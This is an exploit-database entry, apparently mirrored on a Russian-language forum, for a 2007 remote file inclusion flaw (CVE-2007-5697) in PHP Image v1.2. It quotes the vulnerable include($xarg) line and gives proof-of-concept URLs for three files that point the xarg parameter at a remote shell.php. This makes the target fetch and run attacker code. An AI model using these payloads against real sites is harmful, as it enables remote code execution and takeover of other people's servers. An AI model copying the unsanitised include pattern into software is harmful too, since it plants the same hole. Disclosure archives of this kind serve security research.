- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4565
- Проверка EDB
-
- Пройдено
- Автор
- CIVI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5697
- Дата публикации
- 2007-10-23
Код:
PHP Image v1.2 Multiple Remote File Inclusion
Download: http://www.phpimage.co.uk/phpimage_v_1_2.zip
Bug found by Civi
Vuln code in xarg_corner.php, xarg_corner_bottom.php, xarg_corner_top.php:
<td style="background-image: url(images/cor_top_fill.jpg);"><?php include($xarg); ?></td>
POC:
http://site/xarg_corner.php?xarg=http://shell.php?
http://site/xarg_corner_bottom.php?xarg=http://shell.php ?
http://site/xarg_corner_top.php?xarg=http://shell.php?
[Original Post: forum.darkc0de.com]
Tnx to: d3hydr8, str0ke
# milw0rm.com [2007-10-23]- Источник
- www.exploit-db.com
